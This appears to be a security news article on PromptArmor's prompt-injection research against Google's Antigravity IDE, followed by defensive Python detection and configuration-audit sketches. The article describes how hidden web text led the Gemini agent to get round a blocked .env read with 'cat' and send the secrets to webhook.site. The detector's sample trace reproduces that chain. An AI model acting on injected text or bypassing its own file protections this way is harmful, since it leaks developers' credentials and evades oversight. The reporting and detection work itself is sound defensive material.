Security Flaw in Google Antigravity AI IDE Allows Data Exfiltration via Prompt Injection


Barely a week after Google launched Antigravity, its “agent-first” Integrated Development Environment (IDE), security researchers have demonstrated how the tool’s autonomy can be weaponized.

A new report reveals that indirect prompt injection allows attackers to steal credentials by manipulating the very agents designed to boost productivity.

PromptArmor, a security research firm, found that the vulnerability exploits Antigravity’s default settings. By hiding instructions in 1-point font on a webpage, attackers can force the AI to bypass file protections using system commands and exfiltrate secrets to a public logging site.

Despite the severity, Google classifies these behaviors as “intended,” leaving enterprise codebases exposed. These findings highlight a critical gap between the marketing of “reasoning” models and the reality of their default security posture.


The ‘Lethal Trifecta’: Anatomy of the Attack

Exploitation begins with a “poisoned” web source, such as a third-party integration guide containing malicious instructions. Attackers hide the prompt injection in 1-point font in the source, rendering it invisible to human developers but legible to the Gemini model.

Once ingested, the injected prompt instructs the agent to harvest sensitive credentials and code snippets from the user’s local environment. Gemini correctly identifies that the target .env file is listed in .gitignore and initially refuses access based on standard safety protocols.

However, the agent’s autonomy allows it to override this restriction. Following the attacker’s “reasoning,” it circumvents the read restriction by executing the system cat command in the terminal to dump file contents to standard output. The PromptArmor report describes the mechanism:

“Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.”

Such a bypass demonstrates how easily standard guardrails can be dismantled by an agent with system-level access. As the security analysis notes, “Gemini bypasses its own setting to get access and subsequently exfiltrate that data.”

After accessing the credentials, the agent encodes the stolen data into a URL string.

Finally, the attack involves sending the data to webhook.site, a public request logging service. Exfiltration becomes possible only because webhook.site is inexplicably included in Antigravity’s default Browser URL Allowlist. The researchers highlight this configuration flaw:

“However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.”

Inclusion of such a domain in a default allowlist effectively nullifies network egress protections, allowing data to leave the local environment without triggering alerts.
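The chain described above (a blocked built-in file read, the same file dumped through the terminal, then an outbound request to an allowlisted request-logging domain) is the kind of sequence an agent action trace should be monitored for. The following detection sketch is an added example, not code from PromptArmor or Google: the trace format, the tool names (read_file, run_terminal, browser_open), the domain and file-name lists, and the sample trace itself are all assumptions constructed for illustration.

```python
"""Runtime detection sketch for the bypass-then-egress chain described above.

Added example, not PromptArmor's or Google's code. The trace format, tool names
and domain/file lists are assumptions; SAMPLE_TRACE is constructed.
"""
from urllib.parse import urlsplit

# Assumption: services that log any inbound request and so act as drop points.
PUBLIC_REQUEST_LOGGERS = {"webhook.site"}
# Assumption: file names a reviewer would want flagged when read from a shell.
SENSITIVE_FILES = {".env", "id_rsa", ".npmrc"}
# Common commands that dump a file to standard output.
SHELL_DUMPERS = ("cat ", "head ", "tail ", "less ", "more ", "base64 ", "xxd ")

# Constructed trace following the sequence the article describes: a blocked
# built-in read, the same file read through the terminal, then an outbound
# request to an allowlisted public request logger with data in the query.
SAMPLE_TRACE = [
    {"step": 1, "tool": "read_file", "arg": ".env",
     "result": "blocked: path matches .gitignore"},
    {"step": 2, "tool": "run_terminal", "arg": "cat .env", "result": "ok"},
    {"step": 3, "tool": "browser_open",
     "arg": "https://webhook.site/CONSTRUCTED-ID?d=PLACEHOLDER_ENCODED_DATA",
     "result": "ok"},
]


def is_shell_read_of(cmd, path):
    """True if the terminal command dumps the given file with a common tool."""
    return cmd.startswith(SHELL_DUMPERS) and path in cmd.split()


def analyze(trace):
    """Return findings as (kind, step, detail) tuples for the pattern
    blocked built-in read -> shell read -> egress to a request logger."""
    findings = []
    blocked = {}     # path -> step where the built-in read was refused
    shell_read = {}  # path -> step where a shell tool dumped it instead
    for ev in trace:
        tool, arg, step = ev["tool"], ev["arg"], ev["step"]
        if tool == "read_file" and ev["result"].startswith("blocked"):
            blocked[arg] = step
        elif tool == "run_terminal":
            for path in set(blocked) | SENSITIVE_FILES:
                if not is_shell_read_of(arg, path):
                    continue
                shell_read[path] = step
                if path in blocked:
                    findings.append(("guardrail_bypass", step,
                        f"{path} dumped via shell after built-in read was "
                        f"blocked at step {blocked[path]}"))
                else:
                    findings.append(("sensitive_file_read", step,
                        f"{path} dumped via shell"))
        elif tool == "browser_open":
            url = urlsplit(arg)
            host = (url.hostname or "").lower()
            # Only alert when a sensitive read precedes the outbound request.
            if host in PUBLIC_REQUEST_LOGGERS and shell_read:
                findings.append(("possible_exfiltration", step,
                    f"request to {host} carrying {len(url.query)} query bytes "
                    f"after reading {sorted(shell_read)}"))
    return findings


if __name__ == "__main__":
    for kind, step, detail in analyze(SAMPLE_TRACE):
        print(f"step {step}: {kind}: {detail}")
```

The point of correlating the three events rather than alerting on any one of them is precision: a lone `cat .env` is ordinary developer activity, and a lone request to a request-logging site may be a legitimate integration test. The combination, in that order, is what the report describes.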

Policy vs. Reality: Google’s ‘Intended Behavior’ Stance

PromptArmor deviated from the standard 90-day responsible disclosure window for these findings. Justifying this decision, the firm cited Google’s prior classification of similar reports as “intended behavior” rather than security flaws.

According to the researchers, “Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.”

A fundamental disagreement exists between security professionals and Google regarding the acceptable risk profile of agentic tools.

Official documentation supports PromptArmor’s assessment of Google’s policy. Google’s Bug Hunters platform explicitly lists “Antigravity agent has access to files” and “permission to execute commands” as invalid report types. The official policy states:

“Antigravity agent has access to files” […] “Antigravity agent has permission to execute commands”

Such a “wontfix” stance clashes with the narrative surrounding the Antigravity IDE launch, where executives positioned Gemini 3 Pro as a sophisticated reasoning engine capable of complex problem-solving.

Secondary findings from other researchers corroborate the risks. Security researcher ‘wunderwuzzi23’ (Embrace The Red) identified remote command execution risks that extend beyond the browser-based attack vector.

PromptArmor also noted that the vulnerabilities are not limited to specific configurations: “We found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.”

The Agentic Dilemma: Productivity vs. Security

Industry leaders are struggling to balance the friction-free promise of “agent-first” development with the need for rigid security boundaries. Antigravity ships with “Agent Decides” as the default review policy, effectively removing the human from the loop for most actions.

Compounding the issue is a “Terminal Command Auto Execution” policy, which allows the agent to run system commands like cat or curl without user confirmation. These defaults prioritize speed over safety, creating an environment ripe for exploitation.

The security experts describe this as a “Lethal Trifecta” of risk factors. Vulnerabilities exist because the agent has simultaneous access to untrusted input (the web), private data (the codebase), and external communication (the internet).

The lethal trifecta concept highlights that when all three conditions are met, data exfiltration becomes almost inevitable without strict isolation.

While tools like Cursor and Windsurf face similar theoretical risks, Antigravity’s permissive default allowlist makes it uniquely susceptible to immediate exfiltration. Other platforms typically require explicit user approval for network requests to new domains.

Mitigations proposed by experts include isolating “YOLO-mode” agents, which disable all safety checks, in firewalled Virtual Machines (VMs) rather than running them directly on the host OS.

Without such measures, these findings may chill enterprise adoption of autonomous coding tools until vendors implement strict network egress filtering and sandboxing by default.
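The trifecta framing above and the mitigations that follow it reduce to a configuration question: does the agent simultaneously hold untrusted input, private data and a route out, and which defaults make that combination exploitable without a human in the loop? The audit below is an added example, not Antigravity’s own configuration schema: the key names are assumptions chosen to mirror the settings the article names (review policy, terminal command auto-execution, browser tools and the browser URL allowlist), and both sample configurations are constructed.

```python
"""Configuration audit for the three trifecta conditions and the risky defaults
the article describes.

Added example, not Antigravity's configuration schema. Key names are assumptions
mirroring the settings named in the article; the sample configs are constructed.
"""

# Assumption: domains that log arbitrary inbound requests; never allowlist by default.
PUBLIC_REQUEST_LOGGERS = {"webhook.site"}

# Constructed config mirroring the defaults the article describes.
DEFAULT_LIKE = {
    "review_policy": "Agent Decides",
    "terminal_auto_execution": True,
    "browser_tools": True,
    "browser_url_allowlist": ["github.com", "docs.python.org", "webhook.site"],
    "workspace_has_private_data": True,   # .env files, keys, proprietary code
    "network_isolated": False,            # assumption: egress filtered to vetted hosts?
}

# Constructed config after applying the mitigations the article mentions.
ISOLATED = {
    "review_policy": "Ask Before Acting",  # assumed policy name
    "terminal_auto_execution": False,
    "browser_tools": True,
    "browser_url_allowlist": ["github.com", "docs.python.org"],
    "workspace_has_private_data": True,
    "network_isolated": True,
}


def trifecta(cfg):
    """Which of the three conditions hold: untrusted input, private data,
    and a usable path for external communication."""
    can_reach_out = (
        (cfg["browser_tools"] and bool(cfg["browser_url_allowlist"]))
        or cfg["terminal_auto_execution"]
    )
    return {
        "untrusted_input": cfg["browser_tools"],
        "private_data": cfg["workspace_has_private_data"],
        "external_communication": can_reach_out and not cfg["network_isolated"],
    }


def audit(cfg):
    """Return (risk_level, findings).

    'critical' when all three conditions hold together with an unsafe default,
    'elevated' when they hold but a human approves each action,
    'low' when at least one leg of the trifecta is removed."""
    findings = []
    if cfg["review_policy"] == "Agent Decides":
        findings.append("review policy lets the agent approve its own actions")
    if cfg["terminal_auto_execution"]:
        findings.append("terminal commands run without confirmation")
    loggers = sorted(set(cfg["browser_url_allowlist"]) & PUBLIC_REQUEST_LOGGERS)
    if loggers:
        findings.append(f"allowlist contains public request loggers: {loggers}")
    conditions = trifecta(cfg)
    if not all(conditions.values()):
        missing = [k for k, v in conditions.items() if not v]
        return "low", findings + [f"trifecta broken, missing: {missing}"]
    if findings:
        return "critical", findings + ["all three trifecta conditions hold"]
    return "elevated", ["all three trifecta conditions hold; human review is the only control"]


if __name__ == "__main__":
    for name, cfg in (("default-like", DEFAULT_LIKE), ("isolated", ISOLATED)):
        level, notes = audit(cfg)
        print(f"{name}: {level}")
        for note in notes:
            print(f"  - {note}")
```

Note that tightening the review policy alone only moves a workspace from “critical” to “elevated”: all three conditions still hold, and the human approving each action becomes the sole control. Removing a leg of the trifecta, here by filtering egress in an isolated VM and dropping request-logging domains from the allowlist, is what brings the rating down.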
